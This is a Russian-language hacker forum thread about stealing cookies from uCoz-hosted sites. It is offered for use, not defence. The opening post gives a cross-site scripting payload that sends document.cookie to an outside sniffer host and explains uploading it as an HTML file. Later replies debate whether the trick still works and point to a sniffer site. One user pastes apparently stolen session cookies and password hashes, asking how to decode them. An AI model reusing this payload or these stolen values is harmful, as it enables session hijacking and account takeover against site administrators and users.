Форумы А вот и долгожданный Ucoz

Всем привет! толькочто нашёл уязвимость в Ucoz, пишусь впервый раз))

Тырим куки в Ucoz

1) создаём фйлик html вписываем код который тырит куки

Code:

<script>img = new Image(); img.src = "http://sniffer.ru/images/1.gif?"+document.cookie;</script>

2) Загружаем наш html файлик через "Обзор"

Смотрим скрин

4) Должно получиться примерно так когда файлик загружен

Смотрим скрин

5) Смотрим логи на сниффере (у меня свой сниффер)

Смотрим скрин

Ну вот и всё...

 

На UcoZе куки Админов привязаны к IP.

 

Хотя может я ошибаюсь...

 

Хех где то похожее читал ток там через чат можно админку на укозе утащить..
а так в целом прикольно за мутил респект..

 

не подскажешь где читал?)

 

если про бесцветный смайлик со скриптом то это не пашет уже

 

не новый способ.. подробнее кто хочет _http://hacker-pro.net/sniffer/ там и видео есть вроде

 

еще актуально?

 

еще актуально, но на некоторых сайтах запрещено добавлять html файлы..

 

Куки Админов привязаны к айпи. Хотя должно прокатить всеравно.

 

уже не катит этот вариант ....имхо

 

Я смог стырить, но как расшифровать и узнал логин?

itemMarking_forums_items=eJxNzssNAzEIBNCWzHfAW02OW0O0vQfhOM7JmlwnwPOaxPN9T1ZXu-5KCEuzpAqMDPyQBFiI2AjN4EZPHKwLFRC6SYREeg5sB4cuzH4XcvRyXTT-Q_Y16X4QlN-W46D5WCj7d2Vy7coDuySFV-Xr-VwwFJc7jA,,; treemenu=none open; dle_user_id=142; dle_password=d8be0919a798095266621a780e173255; member_id=142; pass_hash=577868b50d1676e9cb3c191a1fe85f6b; PHPSESSID=8112a33d76ac231f8ca1e023a1084019; session_id=b4156144ec733882e1f16ac52eb8c285; forum_session_id=b4156144ec733882e1f16ac52eb8c285; modtids=,

 

Актуально ?